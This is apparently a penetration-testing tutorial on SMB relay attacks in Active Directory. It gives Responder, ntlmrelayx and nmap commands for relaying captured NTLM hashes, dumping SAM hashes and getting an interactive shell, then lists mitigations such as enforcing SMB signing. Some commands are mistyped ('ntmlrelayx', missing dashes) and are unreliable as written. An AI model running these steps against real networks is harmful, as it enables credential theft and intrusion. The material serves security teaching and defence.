SMB Relay: An AD Attack
What is SMB Relay?
- Instead of cracking the hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access.
Requirements:
- SMB signing must be disabled on the target.
- Relayed user credentials must be admin on machine.
SMB signing will check that the packets are coming from right place and it is signed.
If the SMB signing is enabled then it will not let the packets to send and it will say that you are not the right person to send the packets.
And if the SMB signing is disabled then it will basically see that there is a user and a hash and it will let the user on the machine.
Steps:
Step 1: Run Responder
gedit Responder.conf and will turn off the HTTP and SMB.
Step 2: Run Responder
Command: python Responder.py -I tun0 -rdw
Step 3: Set up your relay
python ntlmrelayx.py -tf targets.txt -smb2support
Step 4: An Event occurs……
Step 5: Win
Like there is shadow file in Linux, similarly windows has SAM file.
These dumped hashes are of local users, not the domain users.
But we can take down the entire network using these local user’s hashes.
Discovering Hosts with SMB Signing Disabled
We have to identify what is SMB Sign Enabled and SMB Sign Disabled.
There are few ways to identify:
- With Nessus scan: It will neatly tell you that these servers are SMB sign Disabled.
- With Nmap: We will use Nmap scripts to check the SMB Signing.
Checking Using Nmap:
Command: nmap — script=smb2-security-mode.nse -p445 192.168.57.0/24
This will check the SMB signing on the whole network.
We will make a put this single IP address in a file named as target.txt
SMB Relay Attack
Now we will turn off the HTTP and SMB in /etc/responder/Responder.conf
Now we start the responder.
Command: responder -I eth0 -rdwv
Now we will send the relay,
Command: ntmlrelayx.py -tf targets.txt smb2support
Now we will trigger the target machine:
Now we have got the hashes:
We can also get Interactive shell by using ntlmrelayx.py
Command: ntlmrelayx.py -tf targets.txt smb2support -i
Here -i means interactive, it will help to gain the interactive shell.
-tf means target file.
Now we will do the same process to trigger the event.
Now we have got the shell on our local host at 11000 port.
Now we will open another tab and use netcat to get on that gained shell.
Command: nc 127.0.0.1 11000
Now we have got the shell……
We can gain shell with multiple methods:
- psexec
- smbexec
- metasploit(psexec)
- wmiexec
SMB Relay Attack Defences
Mitigation strategies:
Enable SMB Signing on all devices
- Pro: Completely Stops the attack.
- Con: can cause performance issues with the file copies.
Disable NTLM authentication on network
- Pro: Completely stops the attack.
- Con: If kerberos stops working, Windows default back to NTLM.
Accounting tiering:
- Pro: Limits domain admins to specific tasks(e.g. only log onto servers with need of DA)
- Con: Enforcing the policy may be difficult.
Local admin restriction:
- Pro: Can prevent a lot of lateral movement.
- Con: Potential increase in the amount of service desk tickets.